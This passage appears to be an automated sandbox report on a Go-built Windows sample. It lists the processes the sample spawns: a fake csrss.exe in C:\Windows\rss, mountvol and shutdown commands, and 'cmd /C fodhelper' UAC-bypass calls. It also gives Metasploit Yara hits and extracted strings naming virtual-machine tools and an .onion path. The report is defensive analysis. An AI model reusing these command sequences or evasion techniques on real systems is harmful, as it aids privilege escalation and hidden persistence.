Path:	C:\Windows\SysWOW64\mountvol.exe
Wow64 process (32bit):	true
Commandline:	mountvol B: /s
Imagebase:	0x1f0000
File size:	15360 bytes
MD5 hash:	5C11B99E6D41403031CD946255E8A353
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6740 Parent PID: 6596

General

Start time:	20:35:30
Start date:	11/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: mountvol.exe PID: 5956 Parent PID: 6644

General

Start time:	20:35:31
Start date:	11/11/2021
Path:	C:\Windows\SysWOW64\mountvol.exe
Wow64 process (32bit):	true
Commandline:	mountvol B: /d
Imagebase:	0x1f0000
File size:	15360 bytes
MD5 hash:	5C11B99E6D41403031CD946255E8A353
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: csrss.exe PID: 2268 Parent PID: 664

General

Start time:	20:35:31
Start date:	11/11/2021
Path:	C:\Windows\rss\csrss.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\rss\csrss.exe
Imagebase:	0x400000
File size:	4534824 bytes
MD5 hash:	430E6667D7609792F43EF40150050E19
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000001F.00000003.374819187.000000000638A000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000001F.00000002.410184897.0000000005700000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: conhost.exe PID: 4036 Parent PID: 5956

General

Start time:	20:35:32
Start date:	11/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: csrss.exe PID: 4848 Parent PID: 3352

General

Start time:	20:35:32
Start date:	11/11/2021
Path:	C:\Windows\rss\csrss.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\rss\csrss.exe"
Imagebase:	0x400000
File size:	4534824 bytes
MD5 hash:	430E6667D7609792F43EF40150050E19
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000021.00000003.363027813.000000000638A000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000021.00000002.401387176.0000000000400000.00000040.00020000.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: mountvol.exe PID: 2976 Parent PID: 6644

General

Start time:	20:35:32
Start date:	11/11/2021
Path:	C:\Windows\SysWOW64\mountvol.exe
Wow64 process (32bit):	true
Commandline:	mountvol B: /s
Imagebase:	0x1f0000
File size:	15360 bytes
MD5 hash:	5C11B99E6D41403031CD946255E8A353
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6276 Parent PID: 2976

General

Start time:	20:35:36
Start date:	11/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: mountvol.exe PID: 4932 Parent PID: 6644

General

Start time:	20:35:38
Start date:	11/11/2021
Path:	C:\Windows\SysWOW64\mountvol.exe
Wow64 process (32bit):	true
Commandline:	mountvol B: /d
Imagebase:	0x1f0000
File size:	15360 bytes
MD5 hash:	5C11B99E6D41403031CD946255E8A353
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 1580 Parent PID: 4932

General

Start time:	20:35:39
Start date:	11/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: shutdown.exe PID: 7128 Parent PID: 6644

General

Start time:	20:35:40
Start date:	11/11/2021
Path:	C:\Windows\SysWOW64\shutdown.exe
Wow64 process (32bit):	true
Commandline:	shutdown -r -t 5
Imagebase:	0x1130000
File size:	23552 bytes
MD5 hash:	E2EB9CC0FE26E28406FB6F82F8E81B26
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: csrss.exe PID: 6708 Parent PID: 3352

General

Start time:	20:35:40
Start date:	11/11/2021
Path:	C:\Windows\rss\csrss.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\rss\csrss.exe"
Imagebase:	0x400000
File size:	4534824 bytes
MD5 hash:	430E6667D7609792F43EF40150050E19
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000027.00000003.375600027.000000000638A000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000027.00000002.415953009.0000000005700000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: conhost.exe PID: 6500 Parent PID: 7128

General

Start time:	20:35:41
Start date:	11/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 4936 Parent PID: 4848

General

Start time:	20:35:43
Start date:	11/11/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Sysnative\cmd.exe /C fodhelper
Imagebase:	0x7ff7fa260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 3836 Parent PID: 4936

General

Start time:	20:35:43
Start date:	11/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: fodhelper.exe PID: 6648 Parent PID: 4936

General

Start time:	20:35:43
Start date:	11/11/2021
Path:	C:\Windows\System32\fodhelper.exe
Wow64 process (32bit):	false
Commandline:	fodhelper
Imagebase:	0x7ff7644f0000
File size:	46080 bytes
MD5 hash:	1D1F9E564472A9698F1BE3F9FEB9864B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: fodhelper.exe PID: 6408 Parent PID: 4936

General

Start time:	20:35:44
Start date:	11/11/2021
Path:	C:\Windows\System32\fodhelper.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\fodhelper.exe"
Imagebase:	0x7ff7644f0000
File size:	46080 bytes
MD5 hash:	1D1F9E564472A9698F1BE3F9FEB9864B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: fodhelper.exe PID: 3336 Parent PID: 4936

General

Start time:	20:35:47
Start date:	11/11/2021
Path:	C:\Windows\System32\fodhelper.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\fodhelper.exe"
Imagebase:	0x7ff7644f0000
File size:	46080 bytes
MD5 hash:	1D1F9E564472A9698F1BE3F9FEB9864B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: csrss.exe PID: 6860 Parent PID: 2268

General

Start time:	20:35:48
Start date:	11/11/2021
Path:	C:\Windows\rss\csrss.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\rss\csrss.exe
Imagebase:	0x400000
File size:	4534824 bytes
MD5 hash:	430E6667D7609792F43EF40150050E19
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000032.00000003.433190112.000000000638A000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000032.00000002.437840695.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000032.00000002.441852613.0000000005700000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: cmd.exe PID: 7044 Parent PID: 6708

General

Start time:	20:35:48
Start date:	11/11/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Sysnative\cmd.exe /C fodhelper
Imagebase:	0x7ff7fa260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: csrss.exe PID: 6880 Parent PID: 3336

General

Start time:	20:35:49
Start date:	11/11/2021
Path:	C:\Windows\rss\csrss.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\rss\csrss.exe"
Imagebase:	0x400000
File size:	4534824 bytes
MD5 hash:	430E6667D7609792F43EF40150050E19
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000034.00000003.403303463.000000000638A000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000034.00000002.415283023.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000034.00000002.423136850.0000000005700000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: 1dyvctHqv1.exe PID: 7008 Parent PID: 5116 1dyvctHqv1.exeCOMMON

Executed Functions

Non-executed Functions

Function 00428B10, Relevance: 7.6, Strings: 6, Instructions: 106COMMON

Download Yara Rule

Strings

VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu, xrefs: 00428CF0
,-./01456:;<=>?@BCLMNOPSZ["\, xrefs: 00428C50
bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert, xrefs: 00428C95
runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi, xrefs: 00428C26
", xrefs: 00428CF9
runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:, xrefs: 00428CBC

Memory Dump Source

Source File: 00000000.00000002.294589443.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.297211806.00000000009F9000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.297648317.0000000000C51000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.297655834.0000000000C55000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.297715236.0000000000CA8000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.297721527.0000000000CB6000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.297725974.0000000000CB9000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.297729751.0000000000CBB000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: "$,-./01456:;<=>?@BCLMNOPSZ["\$VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu$bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:$runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi
API String ID: 0-2405844374
Opcode ID: de3a2cf2d3909c46a913fbbc00b11d99987c1667a54191d7621522a8055b41fa
Instruction ID: 42ee82367b21563e109480012d6fe3560eb94324b5bc2d8460cea0574e50dfb9
Opcode Fuzzy Hash: de3a2cf2d3909c46a913fbbc00b11d99987c1667a54191d7621522a8055b41fa
Instruction Fuzzy Hash: E851F5B46097158FD340EF65D18575EBBE0BF88708F818A2EF48887352DB389948DB96

Uniqueness

Uniqueness Score: -1.00%

Function 00434690, Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat, xrefs: 004347C4
m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA, xrefs: 00434778
releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br, xrefs: 00434852
releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau, xrefs: 00434756

Memory Dump Source

Source File: 00000000.00000002.294589443.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.297211806.00000000009F9000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.297648317.0000000000C51000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.297655834.0000000000C55000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.297715236.0000000000CA8000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.297721527.0000000000CB6000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.297725974.0000000000CB9000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.297729751.0000000000CBB000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat$ m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br$releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau
API String ID: 0-626581767
Opcode ID: c984c633b3d57c7832adee5329347aa849f155eae7f752dda53143e7aca2bfc4
Instruction ID: 8241637a7f35ac624855d2df19fea6a5ed42779f520a2a5d8b1c8658a748f46b
Opcode Fuzzy Hash: c984c633b3d57c7832adee5329347aa849f155eae7f752dda53143e7aca2bfc4
Instruction Fuzzy Hash: 4551C7B4608705CFD344EF65D18575EBBE0BF88308F41886EE48887312D7799885CF9A

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 1dyvctHqv1.exe PID: 5384 Parent PID: 7008 1dyvctHqv1.exeCOMMON

Executed Functions

Non-executed Functions

Function 00428B10, Relevance: 7.6, Strings: 6, Instructions: 106COMMON

Download Yara Rule

Strings

VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu, xrefs: 00428CF0
bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert, xrefs: 00428C95
runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi, xrefs: 00428C26
", xrefs: 00428CF9
,-./01456:;<=>?@BCLMNOPSZ["\, xrefs: 00428C50
runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:, xrefs: 00428CBC

Memory Dump Source

Source File: 0000000C.00000002.324236877.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.325277049.00000000009F9000.00000040.00020000.sdmp Download File
Associated: 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp Download File
Associated: 0000000C.00000002.325699661.0000000000C51000.00000040.00020000.sdmp Download File
Associated: 0000000C.00000002.325707206.0000000000C55000.00000040.00020000.sdmp Download File
Associated: 0000000C.00000002.325768745.0000000000CA8000.00000040.00020000.sdmp Download File
Associated: 0000000C.00000002.325779323.0000000000CB6000.00000040.00020000.sdmp Download File
Associated: 0000000C.00000002.325794304.0000000000CB9000.00000040.00020000.sdmp Download File
Associated: 0000000C.00000002.325798216.0000000000CBB000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: "$,-./01456:;<=>?@BCLMNOPSZ["\$VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu$bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:$runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi
API String ID: 0-2405844374
Opcode ID: de3a2cf2d3909c46a913fbbc00b11d99987c1667a54191d7621522a8055b41fa
Instruction ID: 42ee82367b21563e109480012d6fe3560eb94324b5bc2d8460cea0574e50dfb9
Opcode Fuzzy Hash: de3a2cf2d3909c46a913fbbc00b11d99987c1667a54191d7621522a8055b41fa
Instruction Fuzzy Hash: E851F5B46097158FD340EF65D18575EBBE0BF88708F818A2EF48887352DB389948DB96

Uniqueness

Uniqueness Score: -1.00%

Function 00434690, Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA, xrefs: 00434778
releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br, xrefs: 00434852
m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat, xrefs: 004347C4
releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau, xrefs: 00434756

Memory Dump Source

Source File: 0000000C.00000002.324236877.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.325277049.00000000009F9000.00000040.00020000.sdmp Download File
Associated: 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp Download File
Associated: 0000000C.00000002.325699661.0000000000C51000.00000040.00020000.sdmp Download File
Associated: 0000000C.00000002.325707206.0000000000C55000.00000040.00020000.sdmp Download File
Associated: 0000000C.00000002.325768745.0000000000CA8000.00000040.00020000.sdmp Download File
Associated: 0000000C.00000002.325779323.0000000000CB6000.00000040.00020000.sdmp Download File
Associated: 0000000C.00000002.325794304.0000000000CB9000.00000040.00020000.sdmp Download File
Associated: 0000000C.00000002.325798216.0000000000CBB000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat$ m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br$releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau
API String ID: 0-626581767
Opcode ID: c984c633b3d57c7832adee5329347aa849f155eae7f752dda53143e7aca2bfc4
Instruction ID: 8241637a7f35ac624855d2df19fea6a5ed42779f520a2a5d8b1c8658a748f46b
Opcode Fuzzy Hash: c984c633b3d57c7832adee5329347aa849f155eae7f752dda53143e7aca2bfc4
Instruction Fuzzy Hash: 4551C7B4608705CFD344EF65D18575EBBE0BF88308F41886EE48887312D7799885CF9A

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: csrss.exe PID: 6644 Parent PID: 5384 csrss.exeCOMMON

Executed Functions

Non-executed Functions

Function 00428B10, Relevance: 7.6, Strings: 6, Instructions: 106COMMON

Download Yara Rule

Strings

runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi, xrefs: 00428C26
,-./01456:;<=>?@BCLMNOPSZ["\, xrefs: 00428C50
bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert, xrefs: 00428C95
runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:, xrefs: 00428CBC
", xrefs: 00428CF9
VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu, xrefs: 00428CF0

Memory Dump Source

Source File: 00000011.00000002.549328827.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.553432516.00000000009F9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.553581530.0000000000A59000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.553834711.0000000000C51000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.553854833.0000000000C55000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.553904538.0000000000CA8000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.553923365.0000000000CB6000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.553938684.0000000000CB9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.553948921.0000000000CBB000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: "$,-./01456:;<=>?@BCLMNOPSZ["\$VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu$bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:$runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi
